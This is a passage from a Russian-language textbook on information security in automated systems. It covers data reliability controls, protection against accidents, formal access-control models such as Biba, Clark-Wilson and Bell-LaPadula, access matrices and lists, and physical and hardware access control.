применяются известные средства повышения надежности аппаратуры и программного обеспечения АС, а для защиты информации - средства повышения ее достоверности. Для предотвращения аварийной ситуации применяются специальные меры. Методы и средства повышения надежности вычислительных систем и достоверности информации в настоящее время достаточно хорошо разработаны. Проблема надежности автоматизированных систем решается тремя путями: 1. повышением надежности деталей и узлов; 2. построением надежных систем из менее надежных элементов за счет структурной избыточности (дублирование, утроение элементов, устройств, подсистем и т. п.); 3. применением функционального контроля с диагностикой от- каза, увеличивающего надежность функционирования систе- мы путем сокращения времени восстановления отказавшей аппаратуры. Перечисленное реализуется разработчиками АС, и широко описано в литературе, посвященной вопросам разработки и эксплуатации средств вычислительной техники. Одним из основных условий эффективного функционирования ав- томатизированной системы является обеспечение требуемого уровня до- стоверности информации. Под достоверностью информации в АС бу- дем понимать некоторую функцию вероятности ошибки, т. е. события, заключающегося в том, что реальная информация в системе о некото- ром параметре не совпадает в пределах заданной точности с истин- ным значением. Необходимая достоверность достигается использованием различ- ных методов, реализация которых требует введения в системы обработ- ки информации информационной, временной или структурной избыточ- ности, Достоверность при обработке информации достигается путем контроля и вы явления ошибок в исходных и выводимых данных, их ло- кализации и исправления. Условие повышения достоверности - сниже- ние доли ошибок до допустимого уровня. В конкретных АС требуемая
85 достоверность устанавливается с учетом нежелательных последствий, к которым может привести возникшая ошибка, и тех затрат, которые необходимы для ее предотвращения. Методы контроля при обработке информации в АС можно класси- фицировать по различным параметрам: по количеству операций, охватываемых контролем, - единичный (одна операция), групповой (группа последовательных операций), комплексный (контролируется, например, процесс сбора данных); по частоте контроля - непрерывный, циклический, периодический, разовый, выборочный, по отклонениям; по времени контроля - до выполнения основных операций, одно- временно с ними, в промежутках между основными операциями, после них; по виду оборудования контроля - встроенный, контроль с помощью дополнительных технических средств, безаппаратный; по уровню автоматизации - "ручной", автоматизированный, авто- матический. Различают системные, программные и аппаратные методы контроля достоверности. Системные методы направлены на: оптимизацию структуры обработки; поддержание характеристик оборудования в заданных пределах; создание оптимального числа копий и предысторий программ ис- ходных и текущих данных; определение оптимальной величины пакетов данных и скор ости первичной обработки, процедур доступа к массивам данных и др. Программные методы повышения достоверности информации со- стоят в том, что при составлении процедур обработки данных в них предусматривают дополнительные операции, имеющие математическую или логическую связь с алгоритмом обработки данных. Сравнение ре- зультатов этих дополнительных операций с результатами обработки данных позволяет установить с определенной вероятностью наличие или отсутствие ошибок. На основании этого сравнения, как правило, появля- ется возможность исправить обнаруженную ошибку. Аппаратные методы контроля и обнаружения ошибок могут вы- полнять практически те же функции, что и программные. Аппаратными методами обнаруживают ошибки быстрее и ближе к месту их возникно- вения, а также ошибки, недоступные для программных методов. Все перечисленные методы контроля обработки данных базируются на использовании определенной избыточности. При этом различают ме-
86 тоды контроля со структурной, временной и информационной избыточ- ностью. Структурная избыточность требует введения в состав АС допол- ни тельных элементов (резервирование информационных массивов и программных модулей, реализация одних и тех же функций различными про граммами, схемный контроль в технических средствах АС и т. д.). Временная избыточность связана с возможностью неоднократного повторения определенного контролируемого этапа обработки данных. Обычно этап обработки повторяют неоднократно, и результаты обра- ботки сравнивают между собой. В случае обнаружения ошибки произ- водят исправления и повторную обработку. Информационная избыточность может быть естественной и искус- ственной. Естественная информационная избыточность отражает объек- тивно существующие связи между элементами обработки, наличие ко- торых позволяет судить о достоверности информации. Искусственная информационная избыточность характеризуется введением дополни- тельных информационных разрядов в цифровом представлении обраба- тываемых данных и дополнительных операций в процедуре их обработ- ки, имеющих математическую или логическую связь с алгоритмом об- работки данных. На основании анализа результатов дополнительных операций и процедур обработки данных, а также дополнительных ин- формационных разрядов выявляется наличие или отсутствие ошибок определенного типа, а также возможности их исправления. В зависимости от характера информации, особенностей алгоритмов системы, а также от задач, стоящих перед ее адресатами, можно опреде- лить следующие зависимости содержания информации от ошибок при ее передаче: смысловой объем информации в сообщении уменьшается пропор- ционально числу искаженных разрядов в кодовой комбинации данного сообщения; искажение одного или нескольких разрядов приводит почти к пол ной потере остальной части информации, содержащейся в смысловом отрезке информации в сообщении. Известно, что одна буква, цифра или символ представляются в вы- числительных средствах одним байтом. Одно слово может в среднем за- нимать от 1 до 20 букв. Каждой букве, цифре и символу присвоены дво- ичные коды. Таблица кодов составлена так, что пропадание или появле- ние одной единицы в разрядах приводит к замене одной буквы (символа, цифры) на другую. При этом можно утверждать, что в этом случае имеет
87 место однократная ошибка, которая относительно легко обнаруживается простыми средствами аппаратного контроля (например, контролем по модулю 2). В случае же появления двукратной ошибки в байте измениться мо- гут два разряда. Контроль по модулю 2 этого не обнаруживает, что уже может привести к незаметной замене одной буквы на другую. В различ- ных языках существуют слова, которые меняют свой смысл на другой при замене одной буквы другой. Это и есть модификация информации. При трехкратной ошибке вероятность этого со бытия, естественно, уве- личивается. Для возникновения случайной утечки информации при ее обработ- ке в вычислительной системе необходимо, чтобы в результате случай- ных воздействий был перепутан адрес получателя или в правильный ад- рес была выдана другая информация, для него не предназначенная. В первом случае, например, заменилась одна из букв другой (модифика- ция), во втором - адресация ячеек памяти ОЗУ, из которого считывалась ин формация до ее передачи получателю (тоже модификация). Анализ показывает, что вероятность разрушения информации от случайных воздействий больше, чем ее модификации, а вероятность мо- дификации информации больше вероятности ее утечки. Проблема защиты информации в АС от случайных воздействий наверное еще долго будет сохранять свою актуальность. Пока же на уровне АС она решается косвенным путем за счет повышения надежно- сти работы аппаратных средств и применения тестирующих программ. Средствами, решающими непосредственно эту задачу, являются лишь средства повышения достоверности информации при ее передаче по ка- налам связи между удаленными объектами.
2.4.2. Защита информации от аварий
Защита информации от аварий заключается в создании средств пре-
дупреждения, контроля и организационных мер по исключению НСД на комплексе средств автоматизации в условиях отказов его функциониро- вания, отказов системы защиты информации, систем жизнеобеспечения людей на объекте размещения и при возникновении стихийных бед- ствий. Практика показывает, что хотя аварийная ситуация - событие ред- кое (вероятность ее появления зависит от многих причин, в том числе не зависящих от человека, и эти причины могут быть взаимосвязаны), за- щита от нее необходима, так как последствия в результате ее воздей-
88 ствия, как правило, могут оказаться весьма тяжелыми, а потери - безвоз- вратными. Затраты на защиту от аварийных ситуаций могут быть отно- сительно малы, а эффект в случае аварии - большим. Отказ функционирования АС может повлечь за собой отказ систе- мы защиты информации, может открыться доступ к ее носителям: маг- нитным лентам, барабанам, дискам и т. д., что может привести к пред- намеренному разрушению, хищению или подмене носителя. Несанкцио- нированный доступ к внутреннему монтажу аппаратуры может привести к подключению посторонней аппаратуры, разрушению или изменению принципиальной электрической схемы. Отказ системы жизнеобеспечения может привести к выводу из строя обслуживающего и контролирующего персонала. Стихийные бед- ствия: пожар, наводнение, землетрясение, удары молнии и т. д. - могут также привести к указанным выше последствиям. Аварийная ситуация может быть создана преднамеренно нарушителем. В последнем случае применяются организационные мероприятия. На случай отказа функционирования АС подсистема контроля вскрытия аппаратуры снабжается автономным источником питания. Для исключения безвозвратной потери информации носители информации дублируются и хранятся в отдельном удаленном и безопасном месте. Для защиты от утечки информация должна храниться в закрытом крип- тографическим способом виде. В целях своевременного принятия мер по защите системы жизнеобеспечения устанавливаются соответствующие датчики, сигналы с которых поступают на централизованные системы контроля и сигнализации. Наиболее частой и типичной естественной угрозой является пожар. Он может возникнуть по вине обслуживающего персонала, при отказе аппаратуры, а также в результате стихийного бедствия.
2.5. Модели ограничения доступа и разделения привиле-
гий на доступ Как показывает практика, наилучшие результаты в создании без- опасных систем достигаются в том случае, когда разработчики системы учитывают требования безопасности уже на этапе формулирования це- лей разработки и самых общих принципов построения системы. Основ- ную роль при этом играет так называемая модель управления доступом. В англоязычной литературе для обозначения сходного понятия ис- пользуются термины "security model (модель безопасности) и "security
89 policy model" (модель политики безопасности). Эта модель определяет правила управления доступом к информации. Целью построения модели управления доступом является опреде- ление требований по безопасности АС. Для этого модель должна обла- дать несколькими свойствами: быть адекватной моделируемой системе и не избыточной; быть простой и абстрактной, и поэтому несложной для понимания. Модель должна позволять провести анализ свойств системы, но не накладывать ограничений на реализацию тех или иных механизмов за- щиты. На сегодняшний день создан ряд типовых моделей управления до- ступом, которые можно использовать при разработке системы.
2.6. Абстрактные модели управления доступа
Механизм управления доступом реализует на практике некоторую абстрактную (или формальную) модель [12;18;20], определяющую пра- вила задания разграничительной политики доступа к защищаемым ре- сурсам и правила обработки запросов доступа к защищаемым ресурсам.
2.6.1. Модель Биба
Одной из первых моделей была опубликованная в 1977 модель
Биба (Biba). Согласно этой модели все субъекты и объекты предвари- тельно разделяются по нескольким уровням доступа. Затем на их взаи- модействия накладываются следующие ограничения: субъект не может вызывать на исполнение субъекты с более низ- ким уровнем доступа; субъект не может модифицировать объекты с более высоким уровнем доступа. Эта модель очень напоминает ограничения, введенные в защи- щенном режиме микропроцессоров Intel 80386+ относительно уровней привилегий.
2.6.2. Модель Гогена-Мезигера
Модель Гогена-Мезигера (Goguen-Meseguer), представленная ими
в 1982 году, основана на теории автоматов. Согласно этой модели си- стема может при каждом действии переходить из одного разрешенного состояния только в несколько других. Субъекты и объекты в данной мо- дели защиты разбиваются на группы — домены.
90 Переход системы из одного состояния в другое выполняется толь- ко в соответствии с так называемой таблицей разрешений, в которой указано, какие операции может выполнять субъект, например, из домена С над объектом из домена D. В данной модели при переходе системы из одного разрешенного состояния в другое используются транзакции, что обеспечивает общую целостность системы. Это модель послужила от- правной точкой для разработки политики безопасности в службе катало- гов Active Directory Microsoft.
2.6.3. Сазерлендская модель
Сазерлендская (от англ. Sutherland) модель защиты, опубликован-
ная в 1986 году, основана на взаимодействии субъектов и потоков ин- формации. Так же как и в предыдущей модели, здесь используется ма- шина состояний со множеством разрешенных комбинаций состояний и некоторым набором начальных позиций. В данной модели исследуется поведение множественных композиций функций перехода из одного со- стояния в другое.
2.6.4. Модель Кларка-Вильсона
Важную роль в теории защиты информации играет модель разгра-
ничения доступа Кларка-Вильсона (Clark-Wilson), опубликованная в 1987 году и модифицированная в 1989. Основана данная модель на по- всеместном использовании транзакций и тщательном оформлении прав доступа субъектов к объектам. В данной модели впервые исследована защищенность третьей стороны — стороны, поддерживающей всю си- стему безопасности. Эту роль в информационных системах обычно иг- рает программа-супервизор. Кроме того, в модели Кларка-Вильсона транзакции впервые были построены по методу верификации, то есть идентификация субъекта производилась не только перед выполнением команды от него, но и по- вторно после выполнения. Это позволило снять проблему подмены субъекта в момент между его идентификацией и собственно командой. Модель Кларка-Вильсона считается одной из самых совершенных в от- ношении поддержания целостности информационных систем.
2.7. Современные модели управления доступом
Рассмотрим модель матрицы доступа (Harrison, Ruzo Ullman, 1976). Это частный случай реализации модели машины состояний. Состояния
91 безопасности системы представлены в виде таблицы, содержащей по одной строке для каждого субъекта системы и по одной колонке для каждого субъекта и объекта (табл.6). Каждое пересечение в массиве определяет режим доступа данного субъекта к каждому объекту или другому субъекту системы. Более часто матрица доступа используется не как самостоятельная модель управления доступом, а в качестве одной из нескольких пере- менных состояния в более общей модели конечного автомата. Другим способом описания управления доступом является модель, выраженная в терминах меток безопасности, приписываемых субъектам и объектам системы. Режим доступа, которым обладает субъект по от- ношению к объекту, определяется при сравнении их меток безопасно- сти, вместо того, чтобы искать соответствующее пересечение строки и столбца в матрице доступа. Модель может использовать как матрицу до- ступа, так и атрибуты безопасности. Все подобные модели, рассматри- вающие доступ субъекта к объекту, могут быть названы моделями управления доступом.
92 Таблица 6 Матрица доступа Субъек- Объекты ты O1 O2 O3 … OM S1 R,W,D R - R,W S2 R - - R … SN R,W R R R,W
Примечание: R – право чтения;
W – право записи; D – право удаления. Одна из первых моделей безопасности - и впоследствии наиболее часто используемой - была разработана Дэвидом Беллом и Леонардо ЛаПадула для моделирования работы компьютера и получила наимено- вание модели Белл-ЛаПадула. Кратко поясним суть этой модели. Для этого рассмотрим систему из двух файлов и двух процессов (см. рис. 14). Один файл и один про- цесс являются несекретными, другой файл и процесс - секретными.
Рис. 14. Процесс записи в модели Белл-ЛаПадула.
Простое правило безопасности предотвращает чтение секретного файла несекретным процессом. Оба процесса могут читать и записывать данные в несекретный файл. Однако, легко может произойти нарушение правил управления доступом, если секретный процесс считает информа- цию из секретного файла и запишет ее в несекретный файл. Это эквива- лентно неавторизованному уменьшению класса доступа информации, хотя при этом не изменяется класс доступа ни одного файла.
93 Когда процесс записывает информацию в файл, класс доступа кото- рого меньше, чем класс доступа процесса, имеет место так называемый процесс записи вниз. Ограничение, направленное на исключение нисхо- дящей записи получило в модели Белл-ЛаПадула название свойства ограничения. Таким образом, модель многоуровневой безопасности име- ет два основных свойства: простая безопасность: субъект может только читать объект, если класс доступа субъекта доминирует под классом доступа объекта. Дру- гими словами, субъект может читать "вниз", но не может читать "вверх"; свойство ограничения: субъект может только записать в объект, ес- ли класс доступа субъекта доминируется классом доступа объекта. Субъект может записывать "вверх", но не может записать "вниз". Процесс не может ни читать объект с высшим классом доступа (свойство простой безопасности), ни записать объект с низшим классом доступа (свойство ограничения) (см. рис.15).
Рис. 15. Демонстрация нарушения свойства простой безопасности
При формализации многоуровневого управления безопасностью, модель Белл-ЛаПадула определяет структуру класса доступа и устанав- ливает упорядочивание отношений между классами доступа (доминиро- вание). Кроме того, определяются два уникальных класса доступа: SYSTEM HIGH, который доминирует над всеми остальными классами
94 доступа, и SYSTEM LOW, который доминируется всеми другими клас- сами. Изменения классов доступа в рамках модели Белл-ЛаПадула не допускаются. Управление доступом в модели Белл-ЛаПадула происходит как с использованием матрицы управления доступом, так и с использованием меток безопасности и ранее приведенных правила простой безопасности и свойства ограничения. В дополнение к имеющимся режимам доступа чтения и записи матрица управления доступом включает режимы добав- ления, исполнения и управления - причем последний определяет, может ли субъект передавать другим субъектам права доступа, которыми он обладает по отношению к объекту. Управление при помощи меток безопасности усиливает ограниче- ние предоставляемого доступа на основе сравнения атрибутов класса доступа субъектов и объектов. В модели Белл-ЛаПадула определено около двадцати функции (правил операций), выполняемых при модификации компонентов мат- рицы доступа, при запросе и получении доступа к объекту (например, при открытии файла), создании и удалении объектов: при этом для каж- дой функции доказывается сохранение ею, в соответствии с определени- ем, безопасного состояния. Лишь немногие разработки безопасных си- стем использовали функции, предложенные Белл и ЛаПадула, чаще ис- пользовались собственные функции, разработанные на основе функций модели Белл-ЛаПадула. Поэтому в настоящее время, когда говорят о модели Белл-ЛаПадула, имеются в виду только простое условие без- опасности и свойство ограничения, а не функции, составляющие основу модели, и их доказательства. Помимо выполнения основной своей задачи - математически точно- го представления требований правил управления доступом, модель управления доступом используется в процессе разработки системы для выполнения так называемого анализа информационного потока. Анализ информационного потока - это общая технология для анализа путей утеч- ки информации в системе; она применима к любой модели безопасности.
2.8. Системы разграничения доступа
Основную роль в обеспечении внутренней безопасности АС выпол- няют системы управления доступом (разграничения доступа) субъектов к объектам доступа, реализующие концепцию единого диспетчера до- ступа (в английском варианте "reference monitor"- дословно, монитор ссылок).
95 Сущность концепции диспетчера доступа состоит в том, что неко- торый абстрактный механизм является посредником при всех обращени- ях субъектов к объектам (см. рис.16). Диспетчер доступа должен выполнять следующие функции: проверять права доступа каждого субъекта к любому объекту на основании информации, содержащейся в базе данных защиты (правил разграничения доступа); при необходимости регистрировать факт доступа и его параметры в системном журнале.
Рис. 16. Система разграничения доступа
Основными требованиями к реализации диспетчера доступа явля- ются: требование полноты контролируемых операций, согласно которо- му, проверке должны подвергаться все операции всех субъектов над всеми объектами системы. Обход диспетчера предполагается невозможным; требование изолированности, то есть защищенности диспетчера от возможных изменений субъектами доступа с целью влияния на процесс его функционирования; требование формальной проверки правильности функционирова- ния; минимизация используемых диспетчером ресурсов В самом общем виде работа средств управления доступом субъек- тов к объектам основана на проверке сведений, хранимых в базе данных защиты.
96 Под базой данных защиты (security database) понимают базу дан- ных, хранящую информацию о правах доступа субъектов системы к объектам и другим субъектам. Для внесения изменений в базу данных защиты система разграни- чения доступа должна включать средства для привилегированного поль- зователя (администратора безопасности) по ведению этой базы. Такие средства управления доступом должны обеспечивать возможность вы- полнения следующих операций: добавления и удаления объектов и субъектов; просмотра и изменения соответствующих прав доступа субъектов к объектам. Форма представления базы данных защиты может быть различной. Основу базы данных защиты в общем случае составляет матрица досту- па или ее представления (см. табл.6). Каждый элемент этой матрицы представляет собой кортеж, определяющий права доступа (для всех воз- можных видов доступа) каждого субъекта к каждому объекту или дру- гому субъекту. Сложность управления доступом (ведения матрицы доступа) в ре- альных системах связана не только с большой размерностью матрицы (большим числом субъектов и объектов) и высоким динамизмом ее кор- ректировки, но и с необходимостью постоянного отслеживания при та- ких корректировках большого числа зависимостей между значениями определенных кортежей. Наличие таких зависимостей связано с объек- тивно существующими в предметной области ограничениями и прави- лами наследования полномочий в иерархии объектов и субъектов. Например, пользователь должен наследовать полномочия группы поль- зователей, в которую он входит; права доступа некоторого пользователя к каталогам и файлам не должны превышать соответствующие его права по доступу к диску, на котором они размещены и т.п. При полномочном управлении доступом (категорирование объектов и субъектов и введение ограничений по доступу установленных катего- рий субъектов к объектам различных категорий) на матрицу доступа накладываются дополнительные зависимости между значениями прав доступа субъектов. Существующие ограничения и зависимости между полномочиями существенно усложняют процедуры ведения матриц доступа. Это при- вело к возникновению большого числа способов неявного задания мат- рицы (списки доступа, перечисление полномочий, атрибутная схема и т.п.).
97 Основные показатели оценки эффективности различных способов неявного задания следующие: затраты памяти на хранение образа матрицы доступа, время на выборку (вычисление) значений полномочий (элементов кортежей); удобство ведения матрицы при наличии ограничений и зависимо- стей между значениями ее кортежей (простота и, наглядность, ко- личество требуемых операций при добавлении/удалении субъекта или объекта, назначении/модификации полномочий и т.п.). Рассмотрим основные способы неявного задания матрицы доступа.
2.8.1. Списки управления доступом к объекту
В данной схеме полномочия доступа к объекту представляются в
виде списков (цепочек) кортежей для всех субъектов, имеющих доступ к данному объекту. Это равносильно представлению матрицы по столб- цам с исключением кортежей, имеющих все нулевые значения. Такое представление матрицы доступа получило название "списка управления доступом" (access control list). Этот вид задания матрицы ре- ализован в сетевой ОС Novell Netware. Достоинства: экономия памяти, так как матрица доступа обычно сильно разрежена удобство получения сведений о субъектах, имеющих какой либо вид доступа к заданному объекту; Недостатки: неудобство отслеживания ограничений и зависимостей по наследо- ванию полномочий субъектов неудобство получения сведений об объектах, к которым имеет ка- кой-либо вид доступа данный субъект; так как списки управления доступом связаны с объектом, то при удалении субъекта возможно возникновение ситуации, при которой объ- ект может быть доступен несуществующему субъекту.
2.8.2. Списки полномочий субъектов
В данной модели полномочия доступа субъекта представляются в
виде списков (цепочек) кортежей для всех объектов, к которым он имеет доступ (любого вида). Это равносильно представлению матрицы по строкам с исключением кортежей, имеющих нулевые значения.
98 Такое представление матрицы доступа называется "профилем" (profile) субъекта. В системах с большим количеством объектов профили могут иметь большие размеры и, вследствие этого, ими трудно управлять; изменение профилей нескольких субъектов может потребовать большого количе- ства операций и привести к трудностям в работе системы. Поэтому про- фили обычно используются лишь администраторами безопасности для контроля работы субъектов, и даже такое их применение весьма ограни- чено. Достоинства: экономия памяти, так как матрица доступа обычно сильно разрежена; удобство получения сведений об объектах, к которым имеет какой либо вид доступа данный субъект; Недостатки: неудобство отслеживания ограничений и зависимостей по наследо- ванию полномочий доступа к объектам; неудобство получения сведений о субъектах, имеющих какой либо вид доступа к заданному объекту; так как списки управления доступом связаны с субъектом, то при удалении объекта возможно возникновение ситуации, при которой субъ- ект может иметь права на доступ к несуществующему объекту.
2.8.3. Атрибутные схемы
Так называемые атрибутные способы задания матрицы доступа ос-
нованы на присвоении субъектам и/или объектам определенных меток, содержащих значения атрибутов. Наиболее известным примером неявного задания матрицы доступа является реализация атрибутной схемы в операционной системе Unix. Основными достоинствами этих схем являются: экономия памяти, так как элементы матрицы не хранятся, а дина- мически вычисляются при попытке доступа для конкретной пары субъ- ект-объект на основе их меток или атрибутов; удобство корректировки базы данных защиты, то есть модификации меток и атрибутов; удобство отслеживания ограничений и зависимостей по наследова- нию полномочий субъектов, так как они в явном виде не хранятся, а формируются динамически; отсутствие потенциальной противоречивости. Недостатки:
99 затраты времени на динамическое вычисление значений элементов матрицы при каждом обращении любого субъекта к любому объекту; при атрибутной схеме затруднено задание прав доступа конкретно- го субъекта к конкретному объекту.
2.9. Управление механизмами разграничения доступа
Опыт внедрения и сопровождения систем разграничения доступа в различных организациях позволяет указать на ряд типовых проблем, возникающих при установке, вводе в строй и эксплуатации средств раз- граничения доступа к ресурсам АС, а также предложить подходы к ре- шению этих проблем. В большинстве случаев установка средств защиты производится на реально функционирующие АС. Защищаемая АС используется для ре- шения важных прикладных задач, часто в непрерывном технологическом цикле, и ее руководители и пользователи крайне негативно относятся к любому, даже кратковременному, перерыву в ее функционировании для установки и настройки средств защиты или частичной потере работоспо- собности АС вследствие некорректной работы средств защиты. Внедрение средств защиты осложняется еще и тем, что правильно настроить данные средства с первого раза обычно не представляется возможным. Это, как правило, связано с отсутствием у заказчика полно- го детального списка всех подлежащих защите аппаратных, программ- ных и информационных ресурсов системы и готового непротиворечиво- го перечня прав и полномочий каждого пользователя АС по доступу к ресурсам системы. Поэтому, этап внедрения средств защиты информации обязательно в той или иной мере включает действия по первоначальному выявлению, итеративному уточнению и соответствующему изменению настроек средств защиты. Эти действия должны проходить для владельцев и пользователей системы как можно менее болезненно. Очевидно, что те же самые действия неоднократно придется повто- рять администратору безопасности и на этапе эксплуатации системы каждый раз при изменениях состава технических средств, программного обеспечения, персонала и пользователей и т.д. Такие изменения проис- ходят довольно часто, поэтому средства управления системы защиты должны обеспечивать удобство осуществления необходимых при этом изменений настроек системы защиты.
100 Для поддержки и упрощения действий по настройке средств защи- ты в системе защиты необходимо предусмотреть следующие возможно- сти: выборочное подключение имеющихся защитных механизмов, что обеспечивает возможность реализации режима постепенного поэтапного усиления степени защищенности АС; так называемый “мягкий” режим функционирования средств защи- ты, при котором несанкционированные действия пользователей (дей- ствия с превышением полномочий) фиксируются в системном журнале обычным порядком, но не пресекаются (не запрещаются системой защи- ты). Этот режим позволяет выявлять некорректности настроек средств защиты (и затем производить соответствующие их корректировки) без нарушения работоспособности АС и существующей технологии обра- ботки информации; возможности по автоматизированному изменению полномочий пользователя с учетом информации, накопленной в системных журналах (при работе, как в "мягком", так и обычном режимах). Увеличение количества рабочих станций и использование новых программных средств, включающих большое количество разнообразных программ (например, MS Windows), приводит к существенному увели- чению объема системных журналов регистрации событий, накапливае- мых системой защиты. Объем зарегистрированной информации стано- вится настолько велик, что администратор уже физически не может полностью проанализировать все системные журналы за приемлемое время. Для облегчения работы администратора с системными журналами в системе должны быть предусмотрены следующие возможности: подсистема реализации запросов, позволяющая выбирать из со- бранных системных журналов данные об определенных событиях (по имени пользователя, дате, времени происшедшего события, категории происшедшего события и т.п.). Естественно, такая подсистема должна опираться на системный механизм обеспечения единого времени собы- тий; возможность автоматического разбиения и хранения системных журналов по месяцам и дням в пределах заданного количества послед- них дней. Причем во избежание переполнения дисков по истечении установленного количества дней просроченные журналы, если их не удалил администратор, должны автоматически уничтожаться;
101 желательно также иметь в системе средства автоматической подго- товки отчетных документов установленной формы о работе станций се- ти и имевших место нарушениях. Такие средства позволили бы суще- ственно снять рутинную нагрузку с администрации безопасности.
2.9.1. Ограничение доступа
Ограничение доступа заключается в создании некоторой физиче-
ской замкнутой преграды вокруг объекта защиты с организацией кон- тролируемого доступа лиц, связанных с объектом защиты по своим функциональным обязанностям. Ограничение доступа к комплексам средств автоматизации (АС) обработки информации заключается: в выделении специальной территории для размещения АС; в сооружении по периметру зоны специальных ограждений с охранной сигнализацией; в сооружении специальных зданий или других сооружений; в выделении специальных помещений в здании; в создании контрольно-пропускного режима на территории, в зда- ниях и помещениях. Задача средств ограничения доступа - исключить случайный и преднамеренный доступ посторонних лиц на территорию размещения АС и непосредственно к аппаратуре. В указанных целях создается за- щитный контур, замыкаемый двумя видами преград: физической и кон- трольно-пропускной. Такие преграды часто называют системой охран- ной сигнализации и системой контроля доступа. Традиционные средства контроля доступа в защищаемую зону: из- готовление и выдача допущенным лицам специальных пропусков с раз- мещенной на них фотографией личности владельца и сведений о нем. Данные пропуска могут храниться у владельца или непосредственно в пропускной кабине охраны. В последнем случае допущенное лицо назы- вает фамилию и свой номер либо набирает его на специальной панели кабины при проходе через турникет; пропускное удостоверение выпада- ет из гнезда и поступает в руки работника охраны, который визуально сверяет личность владельца с изображением на фотографии, названную фамилию с фамилией на пропуске. Эффективность защиты данной си- стемы выше первой. При этом исключаются: потеря пропуска, его пере- хват и подделка. Кроме того, есть резерв в повышении эффективности защиты с помощью увеличения количества проверяемых параметров.
102 Однако основная нагрузка по контролю при этом ложится на человека, а он, как известно, может ошибаться. В зарубежной литературе имеются сообщения о применении био- метрических методов аутентификации человека, когда используются в качестве идентификаторов отпечатки пальцев, ладони, голоса, личной подписи. Однако перечисленные методы пока не получили широкого распространения. Совершенствование контрольно-пропускной системы в настоящее время ведется также в направлении совершенствования конструкции пропуска-удостоверения личности путем записи кодовых значений па- ролей. Подробнее вопросы идентификации и проверки подлинности личности рассмотрены ниже. Физическая преграда защитного контура, размещаемая по перимет- ру охраняемой зоны, снабжается охранной сигнализацией. В настоящее время ряд предприятий выпускает электронные систе- мы для защиты военных, государственных и частных объектов от про- никновения в них посторонних лиц. Гарантировать эффективность си- стемы охранной сигнализации можно только в том случае, если обеспе- чены надежность всех ее составных элементов и их согласованное функционирование. При этом имеют значение тип датчика, способ опо- вещения или контроля, помехоустойчивость, а также реакция на сигнал тревоги. Местная звуковая или световая сигнализация может оказаться недостаточной, поэтому местные устройства охраны целесообразно под- ключить к специализированным средствам централизованного управле- ния, которые при получении сигнала тревоги высылают специальную группу охраны. Следить за состоянием датчиков может автоматическая система, расположенная в центре управления, или сотрудник охраны, который находится на объекте и при световом или звуковом сигнале принимает соответствующие меры. В первом случае местные охранные устройства подключаются к центру через телефонные линии, а специализированное цифровое устройство осуществляет периодический опрос состояния датчиков, автоматически набирая номер приемоответчика, расположен- ного на охраняемом объекте. При поступлении в центр сигнала тревоги автоматическая система включает сигнал оповещения. Датчики сигналов устанавливаются на различного рода ограждени- ях, внутри помещений, непосредственно на сейфах и т. д.
103 При разработке комплексной системы охраны конкретного объекта учитывают его специфику: внутреннюю планировку здания, окон, вход- ной двери, размещение наиболее важных технических средств. Все эти факторы влияют на выбор типа датчиков, их расположение и определяют ряд других особенностей данной системы. По принципу действия системы тревожной сигнализации можно классифицировать следующим образом [1]: традиционные (обычные), основанные на использовании цепей сигнализации и индикации в комплексе с различными контактами (датчиками); ультразвуковые; прерывания луча; телевизионные; радиолокационные; микроволновые; прочие.
2.9.2. Разделение привилегий на доступ
Разделение привилегий на доступ к информации заключается в том,
что из числа допущенных к ней должностных лиц выделяется группа, которой предоставляется доступ только при одновременном предъявле- нии полномочий всех членов группы. Задача указанного метода - существенно затруднить преднамерен- ный перехват информации нарушителем. Примером такого доступа мо- жет быть сейф с несколькими ключами, замок которого открывается только при наличии всех ключей. Аналогично в АС может быть преду- смотрен механизм разделения привилегий при доступе к особо важным данным с помощью кодов паролей. Данный метод несколько усложняет процедуру, но обладает высо- кой эффективностью защиты. На его принципах можно организовать до- ступ к данным с санкции вышестоящего лица по запросу или без него. Сочетание двойного криптографического преобразования инфор- мации и метода разделения привилегий позволяет обеспечить высоко- эффективную защиту информации от преднамеренного НСД. Кроме того, при наличии дефицита в средствах, а также в целях по- стоянного контроля доступа к ценной информации со стороны админи- страции потребителя АС в некоторых случаях возможен вариант ис- пользования права на доступ к информации нижестоящего руководителя только при наличии его идентификатора и идентификатора его замести-
104 теля или представителя службы безопасности информации. При этом информация выдается на дисплей только руководителя, а на дисплей подчиненного - только информация о факте ее вызова.
2.9.3. Контроль доступа к аппаратуре
В целях контроля доступа к внутреннему монтажу, линиям связи и
технологическим органам управления используется аппаратура кон- троля вскрытия аппаратуры. Это означает, что внутренний монтаж аппа- ратуры и технологические органы и пульты управления закрыты крыш- ками, дверцами или кожухами, на которые установлены датчики. Датчи- ки срабатывают при вскрытии аппаратуры и выдают электрические сиг- налы, которые по цепям сбора поступают на централизованное устрой- ство контроля. Установка такой системы имеет смысл при наиболее полном перекрытии всех технологических подходов к аппаратуре, включая средства загрузки программного обеспечения, пульт управле- ния ЭВМ и внешние кабельные соединители технических средств, вхо- дящих в состав вычислительной системы. В идеальном случае для си- стем с повышенными требованиями к эффективности защиты информа- ции целесообразно закрывать крышками под механический замок с дат- чиком или ставить под контроль включение также штатных средств вхо- да в систему - терминалов пользователей. Контроль вскрытия аппаратуры необходим не только в интересах защиты информации от НСД, но и для соблюдения технологической дисциплины в целях обеспечения нормального функционирования вы- числительной системы, потому что часто при эксплуатации параллельно решению основных задач производится ремонт или профилактика аппа- ратуры, и может оказаться, что случайно забыли подключить кабель или с пульта ЭВМ изменили программу обработки информации. С позиций защиты информации от несанкционированного доступа контроль вскры- тия аппаратуры защищает от следующих действий: изменения и разрушения принципиальной схемы вычислительной системы и аппаратуры; подключения постороннего устройства; изменения алгоритма работы вычислительной системы путем ис- пользования технологических пультов и органов управления; загрузки посторонних программ и внесения программных "виру- сов" в систему; использования терминалов посторонними лицами и т. д.
105 Основная задача систем контроля вскрытия аппаратуры - перекры- тие на период эксплуатации всех нештатных и технологических подхо- дов к аппаратуре. Если последние потребуются в процессе эксплуатации системы, выводимая на ремонт или профилактику аппаратура перед началом работ отключается от рабочего контура обмена информацией, подлежащей защите, и вводится в рабочий контур под наблюдением и контролем лиц, ответственных за безопасность информации. Доступ к штатным входам в систему - терминалам контролируется с помощью контроля выдачи механических ключей пользователям, а до- ступ к информации - с помощью системы опознания и разграничения доступа, включающей применение кодов паролей, соответствующие функциональные задачи программного обеспечения и специального терминала службы безопасности информации. Указанный терминал и устройство контроля вскрытия аппаратуры входят в состав рабочего места службы безопасности информации, с ко- торого осуществляются централизованный контроль доступа к аппара- туре и информации и управление ее защитой на данной вычислительной системе.
2.9.4. Разграничение и контроль доступа к информации
